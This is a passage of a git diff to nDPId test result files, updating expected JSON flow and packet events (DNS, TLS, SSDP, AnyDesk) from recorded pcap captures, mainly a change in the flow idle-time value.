{"4":"DPI"},"proto":"CiscoVPN.HTTP","breed":"Acceptable","category":"Web"}} 00601{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1569687246982,"flow_last_seen":1569687272377,"flow_idle_time":180000,"flow_min_l4_payload_len":90,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":1070,"flow_avg_l4_payload_len":118,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip6","src_ip":"fe80::408:3e45:3abc:1552","dst_ip":"ff02::fb","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1569687267831,"flow_last_seen":1569687267847,"flow_idle_time":180000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":75,"flow_tot_l4_payload_len":102,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":49781,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} -00935{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":63,"flow_state":"finished","flow_packets_processed":11,"flow_first_seen":1569687269562,"flow_last_seen":1569687273580,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1140,"flow_tot_l4_payload_len":1572,"flow_avg_l4_payload_len":142,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"10.0.0.151","src_port":56955,"dst_port":8060,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": 
{"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} +00935{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":63,"flow_state":"finished","flow_packets_processed":11,"flow_first_seen":1569687269562,"flow_last_seen":1569687273580,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1140,"flow_tot_l4_payload_len":1572,"flow_avg_l4_payload_len":142,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"10.0.0.151","src_port":56955,"dst_port":8060,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} 00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1569687269094,"flow_last_seen":1569687286632,"flow_idle_time":180000,"flow_min_l4_payload_len":4,"flow_max_l4_payload_len":4,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":4,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"10.0.0.1","src_port":52595,"dst_port":192,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1569687269094,"flow_last_seen":1569687286632,"flow_idle_time":180000,"flow_min_l4_payload_len":4,"flow_max_l4_payload_len":4,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":4,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"10.0.0.1","src_port":52595,"dst_port":192,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1569687267805,"flow_last_seen":1569687267824,"flow_idle_time":180000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":150,"flow_tot_l4_payload_len":193,"flow_avg_l4_payload_len":96,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":64193,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.ApplePush","breed":"Acceptable","category":"Cloud"}} 00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1569687267851,"flow_last_seen":1569687267865,"flow_idle_time":180000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":188,"flow_tot_l4_payload_len":221,"flow_avg_l4_payload_len":110,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":58074,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} 
-00591{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":27,"flow_first_seen":1569687256018,"flow_last_seen":1569687267492,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":787,"flow_tot_l4_payload_len":3023,"flow_avg_l4_payload_len":111,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"99.86.34.156","src_port":56920,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00591{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":27,"flow_first_seen":1569687256018,"flow_last_seen":1569687267492,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":787,"flow_tot_l4_payload_len":3023,"flow_avg_l4_payload_len":111,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"99.86.34.156","src_port":56920,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1569687268077,"flow_last_seen":1569687268077,"flow_idle_time":180000,"flow_min_l4_payload_len":514,"flow_max_l4_payload_len":514,"flow_tot_l4_payload_len":514,"flow_avg_l4_payload_len":514,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.149","dst_ip":"10.0.0.227","src_port":38616,"dst_port":61328,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} 
-00648{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":12,"flow_first_seen":1569687262866,"flow_last_seen":1569687262912,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":226,"flow_tot_l4_payload_len":366,"flow_avg_l4_payload_len":30,"midstream":1,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"162.222.43.153","src_port":56881,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} -00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":12,"flow_first_seen":1569687262866,"flow_last_seen":1569687262912,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":226,"flow_tot_l4_payload_len":366,"flow_avg_l4_payload_len":30,"midstream":1,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"162.222.43.153","src_port":56881,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00648{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":12,"flow_first_seen":1569687262866,"flow_last_seen":1569687262912,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":226,"flow_tot_l4_payload_len":366,"flow_avg_l4_payload_len":30,"midstream":1,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"162.222.43.153","src_port":56881,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} 
+00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":12,"flow_first_seen":1569687262866,"flow_last_seen":1569687262912,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":226,"flow_tot_l4_payload_len":366,"flow_avg_l4_payload_len":30,"midstream":1,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"162.222.43.153","src_port":56881,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00681{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1569687267812,"flow_last_seen":1569687267847,"flow_idle_time":180000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":49,"flow_tot_l4_payload_len":82,"flow_avg_l4_payload_len":41,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":51990,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} 00693{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1569687255989,"flow_last_seen":1569687256018,"flow_idle_time":180000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":43,"flow_tot_l4_payload_len":70,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.76.76","src_port":58155,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Slack","breed":"Acceptable","category":"Collaborative"}} 
00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1569687267991,"flow_last_seen":1569687267991,"flow_idle_time":180000,"flow_min_l4_payload_len":174,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":174,"flow_avg_l4_payload_len":174,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"239.255.255.250","src_port":61328,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} diff --git a/test/results/anydesk-2.pcap.out b/test/results/anydesk-2.pcap.out index 69b902e6f..8633e1efb 100644 --- a/test/results/anydesk-2.pcap.out +++ b/test/results/anydesk-2.pcap.out 
@@ -10,18 +10,18 @@ 00795{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"anydesk-2.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1613977585542,"flow_last_seen":1613977585542,"flow_idle_time":180000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1613977585542,"l3_proto":"ip4","src_ip":"192.168.1.187","dst_ip":"192.168.1.1","src_port":55376,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.AnyDesk","breed":"Acceptable","category":"RemoteAccess"},"dns": {"query":"relay-9b6827f2.net.anydesk.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00523{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"anydesk-2.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1613977585553,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":106,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":106,"pkt_l4_len":72,"thread_ts_msec":1613977585553,"pkt":"2MuK4S0uEBMx8Tl2CABFAABcBhBAADkRt3TAqAEBwKgBuwA12FAASAAA6omBgAABAAEAAAAADnJlbGF5LTliNjgyN2YyA25ldAdhbnlkZXNrA2NvbQAAAQABwAwAAQABAABtXAAEisckcw=="} 00811{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":4,"source":"anydesk-2.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1613977585542,"flow_last_seen":1613977585553,"flow_idle_time":180000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":64,"flow_tot_l4_payload_len":112,"flow_avg_l4_payload_len":56,"midstream":0,"thread_ts_msec":1613977585553,"l3_proto":"ip4","src_ip":"192.168.1.187","dst_ip":"192.168.1.1","src_port":55376,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": 
{"4":"DPI"},"proto":"DNS.AnyDesk","breed":"Acceptable","category":"RemoteAccess"},"dns": {"query":"relay-9b6827f2.net.anydesk.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"138.199.36.115"}} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5,"source":"anydesk-2.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1613977595379,"flow_last_seen":1613977595379,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1613977595379,"l3_proto":"ip4","src_ip":"192.168.1.187","dst_ip":"192.168.1.178","src_port":54164,"dst_port":7070,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"anydesk-2.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1613977595379,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1613977595379,"pkt":"KDc3AG3I2MuK4S0uCABFAAA0dDNAAIAGAADAqAG7wKgBstOUG56PGHtIAAAAAIAC+vCE5AAAAgQFtAEDAwgBAQQC"} -00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"anydesk-2.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1613977595380,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1613977595380,"pkt":"2MuK4S0uKDc3AG3ICABFAAA0AABAAEAGtgbAqAGywKgBuxue05RZw\/OWjxh7SYAS\/\/+kVwAAAgQFtAEDAwUEAgAA"} 
-00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7,"source":"anydesk-2.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1613977595380,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1613977595380,"pkt":"KDc3AG3I2MuK4S0uCABFAAAodDRAAIAGAADAqAG7wKgBstOUG56PGHtJWcPzl1AQBAKE2AAA"} -01177{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":8,"source":"anydesk-2.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1613977595379,"flow_last_seen":1613977595380,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":245,"flow_tot_l4_payload_len":245,"flow_avg_l4_payload_len":61,"midstream":0,"thread_ts_msec":1613977595380,"l3_proto":"ip4","src_ip":"192.168.1.187","dst_ip":"192.168.1.178","src_port":54164,"dst_port":7070,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extension","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"3f2fba0262b1a22b739126dfb2fe7a7d","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 
-01502{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":11,"source":"anydesk-2.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1613977595379,"flow_last_seen":1613977595391,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1705,"flow_avg_l4_payload_len":243,"midstream":0,"thread_ts_msec":1613977595391,"l3_proto":"ip4","src_ip":"192.168.1.187","dst_ip":"192.168.1.178","src_port":54164,"dst_port":7070,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extension","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}},"30": {"risk":"Desktop\/File Sharing Session","severity":"Low","risk_score": {"total":1000,"client":800,"server":200}}},"confidence": {"4":"DPI"},"proto":"TLS.AnyDesk","breed":"Acceptable","category":"RemoteAccess"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"3f2fba0262b1a22b739126dfb2fe7a7d","ja3s":"ee644a8a34c434abca4b737ec1d9efad","unsafe_cipher":0,"cipher":"TLS_DHE_RSA_WITH_AES_256_GCM_SHA384","subjectDN":"CN=AnyDesk Client, CN=AnyDesk Client","fingerprint":"F8:4E:27:4E:F9:33:35:2F:1A:69:71:D5:02:6B:B8:72:EF:B7:BA:B0"}} 
-00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":14,"source":"anydesk-2.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1613977595407,"flow_last_seen":1613977595407,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1613977595407,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"192.168.1.187","src_port":52039,"dst_port":7070,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14,"source":"anydesk-2.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1613977595407,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1613977595407,"pkt":"2MuK4S0uKDc3AG3ICABFAABAAABAAEAGtfrAqAGywKgBu8tHG54tLA3cAAAAALAC\/\/97PgAAAgQFtAEDAwUBAQgKHE34xQAAAAAEAgAA"} -00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":15,"source":"anydesk-2.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1613977595407,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1613977595407,"pkt":"KDc3AG3I2MuK4S0uCABFAAA0dDlAAIAGAADAqAG7wKgBshuey0dV\/SLKLSwN3YAS\/\/+E5AAAAgQFtAEDAwgBAQQC"} 
-00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":16,"source":"anydesk-2.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1613977595407,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1613977595407,"pkt":"2MuK4S0uKDc3AG3ICABFAAAoAABAAEAGthLAqAGywKgBu8tHG54tLA3dVf0iy1AQIABwXwAAAAAAAAAA"} -01178{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":17,"source":"anydesk-2.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1613977595407,"flow_last_seen":1613977595408,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":263,"flow_tot_l4_payload_len":263,"flow_avg_l4_payload_len":65,"midstream":0,"thread_ts_msec":1613977595408,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"192.168.1.187","src_port":52039,"dst_port":7070,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extension","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"201999283915cc31cee6b15472ef3332","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 
-01600{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":24,"source":"anydesk-2.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1613977595407,"flow_last_seen":1613977595549,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":813,"flow_tot_l4_payload_len":1076,"flow_avg_l4_payload_len":179,"midstream":0,"thread_ts_msec":1613977595549,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"192.168.1.187","src_port":52039,"dst_port":7070,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extension","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}},"30": {"risk":"Desktop\/File Sharing Session","severity":"Low","risk_score": {"total":1000,"client":800,"server":200}}},"confidence": {"4":"DPI"},"proto":"TLS.AnyDesk","breed":"Acceptable","category":"RemoteAccess"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"201999283915cc31cee6b15472ef3332","ja3s":"4b505adfb4a921c5a3a39d293b0811e1","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_GCM_SHA384","subjectDN":"CN=AnyDesk Client, CN=AnyDesk Client","fingerprint":"86:4F:2A:9F:24:71:FD:0D:6A:35:56:AC:D8:7B:3A:19:E8:03:CA:2E"}} 
+00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5,"source":"anydesk-2.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1613977595379,"flow_last_seen":1613977595379,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1613977595379,"l3_proto":"ip4","src_ip":"192.168.1.187","dst_ip":"192.168.1.178","src_port":54164,"dst_port":7070,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"anydesk-2.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1613977595379,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1613977595379,"pkt":"KDc3AG3I2MuK4S0uCABFAAA0dDNAAIAGAADAqAG7wKgBstOUG56PGHtIAAAAAIAC+vCE5AAAAgQFtAEDAwgBAQQC"} +00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"anydesk-2.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1613977595380,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1613977595380,"pkt":"2MuK4S0uKDc3AG3ICABFAAA0AABAAEAGtgbAqAGywKgBuxue05RZw\/OWjxh7SYAS\/\/+kVwAAAgQFtAEDAwUEAgAA"} +00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7,"source":"anydesk-2.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1613977595380,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1613977595380,"pkt":"KDc3AG3I2MuK4S0uCABFAAAodDRAAIAGAADAqAG7wKgBstOUG56PGHtJWcPzl1AQBAKE2AAA"} 
+01177{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":8,"source":"anydesk-2.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1613977595379,"flow_last_seen":1613977595380,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":245,"flow_tot_l4_payload_len":245,"flow_avg_l4_payload_len":61,"midstream":0,"thread_ts_msec":1613977595380,"l3_proto":"ip4","src_ip":"192.168.1.187","dst_ip":"192.168.1.178","src_port":54164,"dst_port":7070,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extension","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": 